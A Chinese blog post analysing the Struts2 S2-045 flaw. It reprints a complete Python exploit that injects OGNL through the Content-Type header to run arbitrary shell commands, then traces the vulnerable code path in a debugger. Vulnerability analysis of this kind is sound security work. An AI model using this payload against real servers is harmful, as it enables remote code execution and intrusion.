2. IT
    3. 漏洞分析马后炮 s2-045漏洞分析

    漏洞分析马后炮 s2-045漏洞分析

    xiaoxiao2021-03-25  105

    漏洞分析马后炮 s2-045漏洞分析

    本文包含如下内容:

    0x00 目录

    漏洞分析马后炮 s2-045漏洞分析 0x00 目录0x01 环境搭建0x02 PoC分析0x03 代码DEBUG evaluate

    0x01 环境搭建

    现成的符合版本要求的弱环境下载:

    https://raw.githubusercontent.com/mottoin/S2-045/master/S2-045.war

    0x02 PoC分析

    网上下载的exp-s2-045,用来测试漏洞:

    #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "Content-Type:%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % cmd payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" try: headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} request = urllib2.Request(url, headers=headers) page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: page = e.partial print(page) return page

    这里先不解释代码,配合后面的DEBUG来解释以上PoC代码。

    0x03 代码DEBUG

    运行PoC,成功即运行calc,弹出一个计算器 用法为

    *.py [url] [cmd]

    因为我事先分析过了,先在这里打个断点。 此时计算器还没弹出,我们继续跟进到方法:

    getDefaultMessage(String, Locale, ValueStack, Object[], String)

    如下是defaultMessage的内容,他包含我们所有的Content-Type内容,我们跟进他在哪里被引用。

    the request doesn’t contain a multipart/form-data or multipart/mixed stream, content type header is 【Content-Type内容】

    message被代替成传入的参数

    message = defaultMessage

    buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale);

    该段为message最后被引用到的地方,跟进到两个方法内,先到如下:

    translateVariables(String, ValueStack)

    第一次跟进translateVariables方法,发现还是调用的方法,一路跟进,直接看实现具体的实现。

    从这两张图可以看出,他继承了接口

    com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator

    在创建对象后立即重写了方法:

    com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator.evaluate(String)

    最后要知道是,为什么该方法是怎么执行构造的内容的。

    先看看这个方法的API

    evaluate

    Object evaluate(String parsedValue) Evaluated the value parsed by Ognl value stack.

    这里提到Ognl值栈,我们只需要构造Ognl语句,利用Ognl语句获得cmd或者shell。

    转载请注明原文地址: https://ju.6miu.com/read-7980.html

    技术

    最新回复(0)